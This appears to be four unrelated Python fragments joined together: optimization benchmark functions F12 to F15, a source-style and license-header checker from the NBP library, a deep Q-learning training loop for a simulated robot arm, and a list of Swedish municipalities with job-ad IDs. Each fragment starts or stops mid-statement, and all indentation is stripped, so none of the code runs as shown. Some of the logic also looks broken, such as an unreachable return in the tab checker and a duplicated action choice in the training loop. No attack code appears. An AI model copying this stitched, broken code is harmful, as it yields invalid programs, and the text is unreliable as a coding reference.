lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F12:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -50
self.high = 50
self.global_optimum_solution = 0
def get_func_val(self, x):
dim = len(x)
o = (math.pi / dim) * (
10 * ((np.sin(math.pi * (1 + (x[0] + 1) / 4))) ** 2)
+ np.sum(
(((x[: dim - 1] + 1) / 4) ** 2)
* (1 + 10 * ((np.sin(math.pi * (1 + (x[1 :] + 1) / 4)))) ** 2)
)
+ ((x[dim - 1] + 1) / 4) ** 2
) + np.sum(Ufun(x, 10, 100, 4))
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F13:
def __init__(self, num_dimensions):
self.dimensions = num_dimensions
self.low = -50
self.high = 50
self.global_optimum_solution = 0
def get_func_val(self, x):
if x.ndim==1:
x = x.reshape(1,-1)
o = 0.1 * (
(np.sin(3 * np.pi * x[:,0])) ** 2
+ np.sum(
(x[:,:-1] - 1) ** 2
* (1 + (np.sin(3 * np.pi * x[:,1:])) ** 2), axis=1
)
+ ((x[:,-1] - 1) ** 2) * (1 + (np.sin(2 * np.pi * x[:,-1])) ** 2)
) + np.sum(Ufun(x, 5, 100, 4))
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F14:
def __init__(self):
self.dimensions = 2
self.low = -65.536
self.high = 65.536
self.global_optimum_solution = 1
def get_func_val(self, x):
aS = [
[
-32, -16, 0, 16, 32,
-32, -16, 0, 16, 32,
-32, -16, 0, 16, 32,
-32, -16, 0, 16, 32,
-32, -16, 0, 16, 32,
],
[
-32, -32, -32, -32, -32,
-16, -16, -16, -16, -16,
0, 0, 0, 0, 0,
16, 16, 16, 16, 16,
32, 32, 32, 32, 32,
],
]
aS = np.asarray(aS)
bS = np.zeros(25)
v = np.matrix(x)
for i in range(0, 25):
H = v - aS[:, i]
bS[i] = np.sum((np.power(H, 6)))
w = [i for i in range(25)]
for i in range(0, 24):
w[i] = i + 1
o = ((1.0 / 500) + np.sum(1.0 / (w + bS))) ** (-1)
return o
def get_search_range(self):
lows = np.asarray([self.low for i in range(self.dimensions)])
highs = np.asarray([self.high for i in range(self.dimensions)])
arrs = [highs, lows]
return np.asarray(arrs)
def get_global_optimum_solution(self):
return self.global_optimum_solution
def get_dimensions(self):
return self.dimensions
class F15:
def __init__(self):
self.dimensions = 4
self.low = -5
self.high = 5
self.global_optimum_solution = 0.0003075
def get_func_val(self, L):
aK = [
0.1957, 0.1947, 0.1735, 0.16, 0.0844, 0.0627,
0.0456, 0.0342, 0.0323, 0.0235, 0.0246,
]
bK = [0.25, 0.5, 1, 2, 4, 6, 8, 10, 12, 14, 16]
aK = np.asarray(aK)
bK = np.asarray(bK)
bK = 1 / bK
fit = np.sum(
(aK - ((L[0] * (bK ** 2 + L[1] * bK)) / (bK ** 2 + L[2] * bK + L[3]))) ** | |
# No Bugs in Production (NBP) Library
# https://github.com/aenachescu/nbplib
#
# Licensed under the MIT License <http://opensource.org/licenses/MIT>.
# SPDX-License-Identifier: MIT
# Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import logging
import os
from queue import LifoQueue
from inflection import *
filenameExceptions = [
"CODE_OF_CONDUCT.md",
"LICENSE",
"README.md",
"build/CMakeLists.txt",
".clang-format"
]
fileLengthExceptions = [
"README.md",
".travis.yml",
"CODE_OF_CONDUCT.md"
]
fileIndentingExceptions = [
"CODE_OF_CONDUCT.md",
".travis.yml"
]
fileLicenseExceptions = [
".clang-format",
"README.md",
"LICENSE",
".gitignore",
"CODE_OF_CONDUCT.md",
"docs/coding_standard.md",
"build/CMakeLists.txt",
"build/test_config.cmake",
".vscode/settings.json",
".vscode/c_cpp_properties.json"
]
sharpLicense = [
"# No Bugs in Production (NBP) Library",
"# https://github.com/aenachescu/nbplib",
"#",
"# Licensed under the MIT License <http://opensource.org/licenses/MIT>.",
"# SPDX-License-Identifier: MIT",
"# Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>",
"#",
"# Permission is hereby granted, free of charge, to any person obtaining "
"a copy",
"# of this software and associated documentation files (the \"Software\"), "
"to deal",
"# in the Software without restriction, including without limitation the "
"rights",
"# to use, copy, modify, merge, publish, distribute, sublicense, and/or "
"sell",
"# copies of the Software, and to permit persons to whom the Software is",
"# furnished to do so, subject to the following conditions:",
"#",
"# The above copyright notice and this permission notice shall be included "
"in all",
"# copies or substantial portions of the Software.",
"#",
"# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, "
"EXPRESS OR",
"# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF "
"MERCHANTABILITY,",
"# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL "
"THE",
"# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER",
"# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING "
"FROM,",
"# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS "
"IN THE",
"# SOFTWARE.",
""
]
blockLicense = [
"/*",
"No Bugs in Production (NBP) Library",
"https://github.com/aenachescu/nbplib",
"",
"Licensed under the MIT License <http://opensource.org/licenses/MIT>.",
"SPDX-License-Identifier: MIT",
"Copyright (c) 2019-2020 <NAME> <https://github.com/aenachescu>",
"",
"Permission is hereby granted, free of charge, to any person obtaining a "
"copy",
"of this software and associated documentation files (the \"Software\"), "
"to deal",
"in the Software without restriction, including without limitation the "
"rights",
"to use, copy, modify, merge, publish, distribute, sublicense, and/or sell",
"copies of the Software, and to permit persons to whom the Software is",
"furnished to do so, subject to the following conditions:",
"",
"The above copyright notice and this permission notice shall be included "
"in all",
"copies or substantial portions of the Software.",
"",
"THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, "
"EXPRESS OR",
"IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,",
"FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL "
"THE",
"AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER",
"LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING "
"FROM,",
"OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS "
"IN THE",
"SOFTWARE.",
"*/",
""
]
projectPath = ""
def init_globals(projPath):
global projectPath
projectPath = projPath
def check_filename(log, filePath):
log.info("Checking file path... [%s]", filePath)
if not filePath.startswith(projectPath):
log.error(
"File is not in project path. File = [%s]. Project path = [%s]",
filePath,
projectPath
)
return False
filePathRelative = filePath[len(projectPath):]
expectedPath = underscore(filePathRelative)
if expectedPath != filePathRelative:
if filePathRelative in filenameExceptions:
log.info(
"Invalid filename, but it is in exception list."
" Expected = [%s]. Actual = [%s]",
expectedPath,
filePathRelative
)
return True
log.error(
"Invalid filename. Expected = [%s]. Actual = [%s]",
expectedPath,
filePathRelative
)
return False
log.info("File has valid name: [%s]", filePath)
return True
def check_eol_sequence(log, filePath, fileContent):
log.info("Checking EOL sequence... [%s]", filePath)
if fileContent.find(b'\r\n') != -1:
log.error("File has CRLF sequence: [%s]", filePath)
return False
log.info("File has the right EOL sequence: [%s]", filePath)
return True
def check_tabs(log, filePath, fileLines):
log.info("Checking if file has tabs... [%s]", filePath)
status = True
lineId = 0
for l in fileLines:
lineId += 1
pos = l.find('\t')
if pos != -1:
log.error(
"Found tab. File = [%s]. Line = %d. Column = %d",
filePath,
lineId,
pos + 1
)
status = False
if status:
log.info("File has no tabs: [%s]", filePath)
return status
return True
def check_space_before_eol(log, filePath, fileLines):
log.info(
"Checking if file has space characters before eol... [%s]",
filePath
)
status = True
lineId = 0
for l in fileLines:
lineId += 1
if l.endswith(" "):
log.error(
"Found space before eol. File = [%s]. Line = %d",
filePath,
lineId
)
status = False
if status:
log.info("File has no space before eol: [%s]", filePath)
return status
def check_line_length(log, filePath, fileLines):
log.info("Checking line length... [%s]", filePath)
status = True
lineId = 0
filePathRelative = filePath[len(projectPath):]
for l in fileLines:
lineId += 1
if len(l) > 80:
if filePathRelative in fileLengthExceptions:
log.info(
"Found line longer than 80 character but file is in "
"exception list. File = [%s]. Line = %d",
filePath,
lineId
)
continue
log.error(
"Found line longer than 80 characters. File = [%s]. Line = %d",
filePath,
lineId
)
status = False
if status:
log.info("File has no line longer than 80 characters: [%s]", filePath)
return status
def check_new_line_before_eof(log, filePath, fileContent):
log.info("Checking if there is new line before eof... [%s]", filePath)
if not fileContent.endswith(b'\n'):
log.error("File has not new line before eof: [%s]", filePath)
return False
log.info("File has new line before eof: [%s]", filePath)
return True
def check_indenting(log, filePath, fileLines):
log.info("Checking file indenting... [%s]", filePath)
filePathRelative = filePath[len(projectPath):]
if filePathRelative in fileIndentingExceptions:
log.info("File is in exception list: [%s]", filePath)
return True
fileExt = os.path.splitext(filePath)[1]
specialExt = [ '.h', '.c', '.cpp' ]
specialFile = False
if fileExt in specialExt:
specialFile = True
status = True
lineId = 0
for l in fileLines:
lineId += 1
if specialFile:
if l.startswith(" *"):
continue
if l.startswith(" */"):
continue
pos = 0
while pos < len(l) and l[pos] == ' ':
pos += 1
if pos % 4 != 0:
log.error(
"File is not indented correctly. File = [%s]. Line = %d",
filePath,
lineId
)
status = False
log.info("File is indented correctly: [%s]", filePath)
return status
def check_file_license(log, filePath, fileLines):
log.info("Checking file license... [%s]", filePath)
filePathRelative = filePath[len(projectPath):]
startPos = 0
hashBang = "#!/bin/sh"
if os.path.splitext(filePath)[1] == ".sh":
if len(fileLines) >= 2:
if fileLines[0] == hashBang and fileLines[1] == "":
startPos = 2
if len(fileLines) >= len(sharpLicense):
pos = startPos
matched = True
for line in sharpLicense:
if line != fileLines[pos]:
matched = False
break
pos += 1
if matched:
log.info("File has license: [%s]", filePath)
return True
if len(fileLines) >= len(blockLicense):
pos = startPos
matched = True
for line in blockLicense:
if line != fileLines[pos]:
matched = False
break
pos += 1
if matched:
log.info("File has license: [%s]", filePath)
return True
if filePathRelative in fileLicenseExceptions:
log.info(
"File has no license but it is in exception list: [%s]",
filePath
)
return True
log.error("File has no license: [%s]", filePath)
return False
def check_header_guard(log, filePath, fileLines):
log.info("Checking header guard... [%s]", filePath)
if os.path.splitext(filePath)[1] != ".h":
log.info("File is not c/c++ header file [%s]", filePath)
return True
if len(fileLines) | |
import os
import tempfile
import pandas
import tensorflow as tf
import zipfile
import cloudpickle
import numpy as np
import random
import gym
from gym_gazebo.envs import gazebo_env
import baselines.common.tf_util as U
from baselines import logger
from baselines.common.schedules import LinearSchedule
from baselines import deepq
from baselines.deepq.replay_buffer import ReplayBuffer, PrioritizedReplayBuffer
from baselines.deepq.build_graph_robotics import build_train
class ActWrapper(object):
def __init__(self, act, act_params):
self._act = act
self._act_params = act_params
@staticmethod
def load(path):
with open(path, "rb") as f:
model_data, act_params = cloudpickle.load(f)
act = deepqn.build_act(**act_params)
sess = tf.Session()
sess.__enter__()
with tempfile.TemporaryDirectory() as td:
arc_path = os.path.join(td, "packed.zip")
with open(arc_path, "wb") as f:
f.write(model_data)
zipfile.ZipFile(arc_path, 'r', zipfile.ZIP_DEFLATED).extractall(td)
U.load_state(os.path.join(td, "model"))
return ActWrapper(act, act_params)
def __call__(self, *args, **kwargs):
return self._act(*args, **kwargs)
def save(self, path=None):
"""Save model to a pickle located at `path`"""
if path is None:
path = os.path.join(logger.get_dir(), "model.pkl")
with tempfile.TemporaryDirectory() as td:
U.save_state(os.path.join(td, "model"))
arc_name = os.path.join(td, "packed.zip")
with zipfile.ZipFile(arc_name, 'w') as zipf:
for root, dirs, files in os.walk(td):
for fname in files:
file_path = os.path.join(root, fname)
if file_path != arc_name:
zipf.write(file_path, os.path.relpath(file_path, td))
with open(arc_name, "rb") as f:
model_data = f.read()
with open(path, "wb") as f:
cloudpickle.dump((model_data, self._act_params), f)
def load(path):
"""Load act function that was returned by learn function.
Parameters
----------
path: str
path to the act function pickle
Returns
-------
act: ActWrapper
function that takes a batch of observations
and returns actions.
"""
return ActWrapper.load(path)
def step(env, action, state):
"""
Implementation of "step" which uses the given action
as an offset of the existing state. This function overloads
the environment step method and should be used when actions-as-offsets
are required for this particular environment.
"""
# if action == (0.0, 0.0, 0.0):
# print("robot decided to stay still!")
offset_action = [a + s for a,s in zip(list(action), state)]
# print("step: action: ", action)
# print("step: state: ", state)
#print("step: offset_action: ", offset_action)
observation, reward, done, info = env.step(offset_action)
return observation, reward, done, info
def learn(env,
q_func,
lr=5e-4,
max_timesteps=100000,
buffer_size=50000,
exploration_fraction=0.1,
exploration_final_eps=0.02,
train_freq=1,
batch_size=32,
print_freq=100,
checkpoint_freq=1000,
learning_starts=50,
gamma=1.0,
target_network_update_freq=500,
prioritized_replay=False,
prioritized_replay_alpha=0.6,
prioritized_replay_beta0=0.4,
prioritized_replay_beta_iters=None,
prioritized_replay_eps=1e-6,
param_noise=False,
callback=None,
job_id=None,
outdir="/tmp/rosrl/experiments/discrete/deepq/"
):
"""Train a deepqn model.
Parameters
-------
env: gym.Env
environment to train on
q_func: (tf.Variable, int, str, bool) -> tf.Variable
the model that takes the following inputs:
observation_in: object
the output of observation placeholder
num_actions: int
number of actions
scope: str
reuse: bool
should be passed to outer variable scope
and returns a tensor of shape (batch_size, num_actions) with values of every action.
lr: float
learning rate for adam optimizer
max_timesteps: int
number of env steps to optimizer for
buffer_size: int
size of the replay buffer
exploration_fraction: float
fraction of entire training period over which the exploration rate is annealed
exploration_final_eps: float
final value of random action probability
train_freq: int
update the model every `train_freq` steps.
set to None to disable printing
batch_size: int
size of a batched sampled from replay buffer for training
print_freq: int
how often to print out training progress
set to None to disable printing
checkpoint_freq: int
how often to save the model. This is so that the best version is restored
at the end of the training. If you do not wish to restore the best version at
the end of the training set this variable to None.
learning_starts: int
how many steps of the model to collect transitions for before learning starts
gamma: float
discount factor
target_network_update_freq: int
update the target network every `target_network_update_freq` steps.
prioritized_replay: True
if True prioritized replay buffer will be used.
prioritized_replay_alpha: float
alpha parameter for prioritized replay buffer
prioritized_replay_beta0: float
initial value of beta for prioritized replay buffer
prioritized_replay_beta_iters: int
number of iterations over which beta will be annealed from initial value
to 1.0. If set to None equals to max_timesteps.
prioritized_replay_eps: float
epsilon to add to the TD errors when updating priorities.
callback: (locals, globals) -> None
function called at every steps with state of the algorithm.
If callback returns true training stops.
action_no: int
number of actions available in action space
actions_discr: Box space
Discretized actions
Returns
-------
act: ActWrapper
Wrapper over act function. Adds ability to save it and load it.
See header of baselines/deepq/categorical.py for details on the act function.
"""
# Create all the functions necessary to train the model
# sess = tf.Session()
# sess.__enter__()
if job_id is not None:
#Directory for log and Tensorboard data
outdir = '/tmp/rosrl/' + str(env.__class__.__name__) +'/deepq/' + 'sim_' + job_id
else:
outdir = '/tmp/rosrl/' + str(env.__class__.__name__) +'/deepq/'
#TODO This should not go here. Instead pass both action_no and actions as arguments to learn function
#Discrete actions
goal_average_steps = 2
max_number_of_steps = 20
last_time_steps = np.ndarray(0)
n_bins = 10
epsilon_decay_rate = 0.99 ########
it = 1 ######
# Number of states is huge so in order to simplify the situation
# typically, we discretize the space to: n_bins ** number_of_features
joint1_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
joint2_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
joint3_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
action_bins = pandas.cut([-np.pi/2, np.pi/2], bins=n_bins, retbins=True)[1][1:-1]
difference_bins = abs(joint1_bins[0] - joint1_bins[1])
actions_discr = [(difference_bins, 0.0, 0.0), (-difference_bins, 0.0, 0.0),
(0.0, difference_bins, 0.0), (0.0, -difference_bins, 0.0),
(0.0, 0.0, difference_bins), (0.0, 0.0, -difference_bins),
(0.0, 0.0, 0.0)]
action_no = 7
actions = [0, 1, 2, 3, 4, 5, 6]
# capture the shape outside the closure so that the env object is not serialized
# by cloudpickle when serializing make_obs_ph
observation_space_shape = env.observation_space.shape
# with tf.Session(config=tf.ConfigProto()) as session:
def make_obs_ph(name):
return U.BatchInput(observation_space_shape, name=name)
act, train, update_target, debug = build_train(
make_obs_ph=make_obs_ph,
q_func=q_func,
num_actions=action_no,
optimizer=tf.train.AdamOptimizer(learning_rate=lr),
gamma=gamma,
grad_norm_clipping=10,
param_noise=param_noise
)
act_params = {
'make_obs_ph': make_obs_ph,
'q_func': q_func,
#'num_actions': env.action_space.n,
'num_actions': action_no,
}
act = ActWrapper(act, act_params)
# TODO: include also de Prioritized buffer
# # Create the replay buffer
if prioritized_replay:
replay_buffer = PrioritizedReplayBuffer(buffer_size, alpha=prioritized_replay_alpha)
if prioritized_replay_beta_iters is None:
prioritized_replay_beta_iters = max_timesteps
beta_schedule = LinearSchedule(prioritized_replay_beta_iters,
initial_p=prioritized_replay_beta0,
final_p=1.0)
else:
replay_buffer = ReplayBuffer(buffer_size)
beta_schedule = None
# Create the schedule for exploration starting from 1.
exploration = LinearSchedule(schedule_timesteps=int(exploration_fraction * max_timesteps),
initial_p=1.0,
final_p=exploration_final_eps)
# Initialize the parameters and copy them to the target network.
U.initialize()
update_target()
saved_mean_reward = None
obs = env.reset()
reset = True
with tempfile.TemporaryDirectory() as td:
# Log training stuff using tf primitives
summary_writer = tf.summary.FileWriter(outdir, graph=tf.get_default_graph())
# render the environment to visualize the progress
env.render()
sim_r = 0
sim_t = 0
done_quant = 0
model_saved = False
model_file = os.path.join(td, "model")
for e in range(150): # run 10 episodes
print("Episode: ", e)
# reset the environment
obs = env.reset()
print("observation: ", obs[:3])
episode_rewards = [0.0]
for t in range(max_timesteps):
if callback is not None:
if callback(locals(), globals()):
break
# Take action and update exploration to the newest value
kwargs = {}
## TODO: review in more detail
if not param_noise:
update_eps = exploration.value(t)
update_param_noise_threshold = 0.
else:
update_eps = 0.
# # Compute the threshold such that the KL divergence between perturbed and non-perturbed
# # policy is comparable to eps-greedy exploration with eps = exploration.value(t).
# # See Appendix C.1 in Parameter Space Noise for Exploration, Plappert et al., 2017
# # for detailed explanation.
update_param_noise_threshold = -np.log(1. - exploration.value(t) + exploration.value(t) / float(env.action_space.n))
kwargs['reset'] = reset
kwargs['update_param_noise_threshold'] = update_param_noise_threshold
kwargs['update_param_noise_scale'] = True
action = act(np.array(obs)[None], update_eps=update_eps, **kwargs)[0]
if isinstance(env.action_space, gym.spaces.MultiBinary):
env_action = np.zeros(env.action_space.n)
env_action[action] = 1
else:
env_action = action
update_eps = exploration.value(t)
update_param_noise_threshold = 0.
# Choose action
action = act(np.array(obs)[None], update_eps=update_eps, **kwargs)[0]
reset = False
new_obs, rew, done, _ = step(env, actions_discr[action], obs[:3])
# Store transition in the replay buffer.
replay_buffer.add(obs, action, rew, new_obs, float(done))
obs = new_obs
episode_rewards[-1] += rew
# RK: removed this, too many prints
# print("reward: ", rew)
# Log the episode reward
#summary = tf.Summary(value=[tf.Summary.Value(tag="Episode reward", simple_value = episode_rewards[-1]/(t + 1))])
#summary_writer.add_summary(summary, t+ e*max_timesteps)
# print("average episode reward: ", episode_rewards[-1]/(t + 1))
sim_r += rew
sim_t += 1
if done:
# summary = tf.Summary(value=[tf.Summary.Value(tag="Mean episode reward", simple_value = episode_rewards[-1]/(t + 1))])
# summary_writer.add_summary(summary, t)
done_quant += 1
print("Done!")
obs = env.reset()
episode_rewards.append(0.0)
reset = True
if t+ e*max_timesteps > learning_starts and t % | |
'0584', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 6,
'ad_ids': ['24636656', '24631849', '24613868', '24605632', '24597399', '24579124']},
{'id': 'stqv_JGB_x8A', 'name': 'Mjölby', 'type': 'municipality', 'code': '0586', 'region_code': '05',
'region_name': 'Östergötlands län', 'hits': 17,
'ad_ids': ['24648019', '24644313', '24632147', '24628098', '24622278', '24616742', '24596459', '24615796',
'24613095', '24605455']},
{'id': 'yaHU_E7z_YnE', 'name': 'Lekeberg', 'type': 'municipality', 'code': '1814', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 3, 'ad_ids': ['24618574', '24590700', '24573858']},
{'id': 'oYEQ_m8Q_unY', 'name': 'Laxå', 'type': 'municipality', 'code': '1860', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24613284']},
{'id': 'Ak9V_rby_yYS', 'name': 'Hallsberg', 'type': 'municipality', 'code': '1861', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 5, 'ad_ids': ['24645029', '24641916', '24630258', '24625794', '23791205']},
{'id': 'pvzC_muj_rcq', 'name': 'Degerfors', 'type': 'municipality', 'code': '1862', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24640136', '24612483']},
{'id': 'sCbY_r36_xhs', 'name': 'Hällefors', 'type': 'municipality', 'code': '1863', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24597505', '24562629']},
{'id': 'eF2n_714_hSU', 'name': 'Ljusnarsberg', 'type': 'municipality', 'code': '1864', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24620853']},
{'id': 'kuMn_feU_hXx', 'name': 'Örebro', 'type': 'municipality', 'code': '1880', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 83,
'ad_ids': ['24650582', '24650365', '24649289', '24649147', '24648442', '24648272', '24648247', '24647801',
'24646747', '24646234']},
{'id': 'viCA_36P_pQp', 'name': 'Kumla', 'type': 'municipality', 'code': '1881', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 6,
'ad_ids': ['24628041', '24627103', '24620812', '24612404', '24591455', '24525516']},
{'id': 'dbF7_Ecz_CWF', 'name': 'Askersund', 'type': 'municipality', 'code': '1882', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 1, 'ad_ids': ['24614139']},
{'id': 'wgJm_upX_z5W', 'name': 'Karlskoga', 'type': 'municipality', 'code': '1883', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 14,
'ad_ids': ['24641108', '24640044', '24638125', '24627556', '24626010', '24619701', '24614690', '24596123',
'24574044', '24506835']},
{'id': 'WFXN_hsU_gmx', 'name': 'Nora', 'type': 'municipality', 'code': '1884', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 2, 'ad_ids': ['24645958', '24641024']},
{'id': 'JQE9_189_Ska', 'name': 'Lindesberg', 'type': 'municipality', 'code': '1885', 'region_code': '18',
'region_name': 'Örebro län', 'hits': 9,
'ad_ids': ['24621412', '24640141', '24640009', '24631398', '24629694', '24619671', '24594052', '24563255',
'24559937']},
{'id': 'Nufj_vmt_VrH', 'name': 'Skinnskatteberg', 'type': 'municipality', 'code': '1904', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24616844', '24561824']},
{'id': 'jfD3_Hdg_UhT', 'name': 'Surahammar', 'type': 'municipality', 'code': '1907', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 2, 'ad_ids': ['24569744', '24569099']},
{'id': 'sD2e_1Tr_4WZ', 'name': 'Heby', 'type': 'municipality', 'code': '0331', 'region_code': '03',
'region_name': 'Uppsala län', 'hits': 6,
'ad_ids': ['24639987', '24637102', '24636561', '24622419', '24609485', '24606439']},
{'id': 'Fac5_h7a_UoM', 'name': 'Kungsör', 'type': 'municipality', 'code': '1960', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615040']},
{'id': 'oXYf_HmD_ddE', 'name': 'Hallstahammar', 'type': 'municipality', 'code': '1961', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 3, 'ad_ids': ['24620856', '24620183', '24570400']},
{'id': 'jbVe_Cps_vtd', 'name': 'Norberg', 'type': 'municipality', 'code': '1962', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 1, 'ad_ids': ['24615173']},
{'id': '8deT_FRF_2SP', 'name': 'Västerås', 'type': 'municipality', 'code': '1980', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 53,
'ad_ids': ['24650320', '24648681', '24647561', '24647061', '24646018', '24645554', '24645115', '24643524',
'24643419', '24641832']},
{'id': 'dAen_yTK_tqz', 'name': 'Sala', 'type': 'municipality', 'code': '1981', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 9,
'ad_ids': ['24647939', '24629771', '24628165', '24627608', '24625106', '24625081', '24618592', '24607178',
'24568713']},
{'id': '7D9G_yrX_AGJ', 'name': 'Fagersta', 'type': 'municipality', 'code': '1982', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24642864', '24636952', '24621583', '24611864', '24610150', '24596200']},
{'id': '4Taz_AuG_tSm', 'name': 'Köping', 'type': 'municipality', 'code': '1983', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 5,
'ad_ids': ['24641084', '24633855', '24614521', '24579728', '24554788']},
{'id': 'Jkyb_5MQ_7pB', 'name': 'Arboga', 'type': 'municipality', 'code': '1984', 'region_code': '19',
'region_name': 'Västmanlands län', 'hits': 6,
'ad_ids': ['24634844', '24632224', '24630389', '24629338', '24628382', '24523724']},
{'id': '1gEC_kvM_TXK', 'name': 'Olofström', 'type': 'municipality', 'code': '1060', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 3, 'ad_ids': ['24650780', '24607103', '24588059']},
{'id': 'YSt4_bAa_ccs', 'name': 'Karlskrona', 'type': 'municipality', 'code': '1080', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 28,
'ad_ids': ['24651075', '24649518', '24649448', '24645432', '24645121', '24644839', '24628869', '24633251',
'24633023', '24630721']},
{'id': 'vH8x_gVz_z7R', 'name': 'Ronneby', 'type': 'municipality', 'code': '1081', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 10,
'ad_ids': ['24648307', '24648283', '24635765', '24621669', '24621710', '24620613', '24605177', '24605428',
'24603527', '24590026']},
{'id': 'HtGW_WgR_dpE', 'name': 'Karlshamn', 'type': 'municipality', 'code': '1082', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 15,
'ad_ids': ['24649847', '24649768', '24647740', '24632517', '24612809', '24607875', '24607874', '24602594',
'24600682', '24600425']},
{'id': 'EVPy_phD_8Vf', 'name': 'Sölvesborg', 'type': 'municipality', 'code': '1083', 'region_code': '10',
'region_name': 'Blekinge län', 'hits': 4, 'ad_ids': ['24644857', '24625704', '24620694', '24535492']},
{'id': '2r6J_g2w_qp5', 'name': 'Svalöv', 'type': 'municipality', 'code': '1214', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24645986']},
{'id': 'vBrj_bov_KEX', 'name': 'Staffanstorp', 'type': 'municipality', 'code': '1230', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 8,
'ad_ids': ['24648873', '24623551', '24614129', '24598158', '24593510', '24562275', '24565177', '24514487']},
{'id': '64g5_Lio_aMU', 'name': 'Burlöv', 'type': 'municipality', 'code': '1231', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 9,
'ad_ids': ['24649934', '24624002', '24615590', '24596313', '24598750', '24592314', '24583797', '24565624',
'24440835']},
{'id': 'Tcog_5sH_b46', 'name': 'Vellinge', 'type': 'municipality', 'code': '1233', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 3, 'ad_ids': ['24637147', '24622105', '24546803']},
{'id': 'LTt7_CGG_RUf', 'name': '<NAME>', 'type': 'municipality', 'code': '1256', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 4, 'ad_ids': ['24615444', '24610769', '24593919', '24589529']},
{'id': 'nBTS_Nge_dVH', 'name': 'Örkelljunga', 'type': 'municipality', 'code': '1257', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 1, 'ad_ids': ['24620885']},
{'id': 'waQp_FjW_qhF', 'name': 'Bjuv', 'type': 'municipality', 'code': '1260', 'region_code': '12',
'region_name': 'Skåne län', 'hits': 2, 'ad_ids': ['24614178', '24590365']},
